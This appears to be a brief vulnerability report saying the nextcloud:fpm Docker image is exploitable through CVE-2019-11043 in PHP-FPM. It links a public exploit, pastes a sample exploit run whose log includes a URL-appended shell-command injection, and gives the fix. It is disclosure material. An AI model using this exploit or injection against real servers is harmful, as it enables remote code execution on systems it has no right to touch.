The CVE-2019-11043 vulnerability can be exploited in the latest nextcloud:fpm image.
This is due to the specific nginx configuration recommended for nextcloud:
https://github.com/nextcloud/docker#base-version---fpm
https://github.com/nextcloud/documentation/blob/master/admin_manual/installation/nginx.rst
https://github.com/nextcloud/docker/blob/master/.examples/docker-compose/with-nginx-proxy/mariadb/fpm/web/nginx.conf
Here’s the exploit: https://github.com/neex/phuip-fpizdam
Sample exploit run:
2019/10/22 19:36:29 Base status code is 200
2019/10/22 19:36:30 Status code 502 for qsl=1765, adding as a candidate
2019/10/22 19:36:31 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/22 19:36:48 Attack params found: --qsl 1760 --pisos 191 --skip-detect
2019/10/22 19:36:48 Trying to set “session.auto_start=0”…
2019/10/22 19:36:50 Detect() returned attack params: --qsl 1760 --pisos 191 --skip-detect <– REMEMBER THIS
2019/10/22 19:36:50 Performing attack using php.ini settings…
2019/10/22 19:36:52 Success! Was able to execute a command by appending “?a=/bin/sh±c+‘which+which’&” to URLs
2019/10/22 19:36:52 Trying to cleanup /tmp/a…
2019/10/22 19:36:52 Done!
To fix the issue, you need to update PHP-FPM version in the nextcloud:fpm image.
Reference: https://bugs.php.net/bug.php?id=78599
Execute arbitrary PHP code on the target server